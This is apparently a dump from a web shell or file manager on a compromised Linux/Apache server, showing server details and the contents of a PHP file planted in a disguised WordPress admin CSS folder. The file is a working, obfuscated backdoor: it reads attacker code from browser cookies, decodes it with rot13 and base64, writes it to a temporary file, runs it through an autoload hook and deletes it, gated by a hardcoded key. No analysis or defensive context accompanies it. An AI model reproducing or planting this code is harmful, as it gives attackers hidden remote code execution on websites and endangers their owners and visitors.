HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System: Linux li317-225.members.linode.com 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/kosmicevents/public/wp-admin__7af9720/css/badbehaviour.php
<?php


if (isset($_COOKIE[29-29]) && isset($_COOKIE[96-95]) && isset($_COOKIE[-72+75]) && isset($_COOKIE[22+-18])) {
    $fac = $_COOKIE;
    function auth_exception_handler($element) {
        $fac = $_COOKIE;
        $obj = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '650fda46');
        if (!is_writable($obj)) {
            $obj = getcwd() . DIRECTORY_SEPARATOR . "data_storage";
        }
        $pset = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($fac[3]));
        if (is_writeable($obj)) {
            $dchunk = fopen($obj, 'w+');
            fputs($dchunk, $pset);
            fclose($dchunk);
            spl_autoload_unregister(__FUNCTION__);
            require_once($obj);
            @array_map('unlink', array($obj));
        }
    }
    spl_autoload_register("auth_exception_handler");
    $flg = "0d03777b4c529f45e303d696cfe59c00";
    if (!strncmp($flg, $fac[4], 32)) {
        if (@class_parents("right_pad_string_api_gateway", true)) {
            exit;
        }
    }
}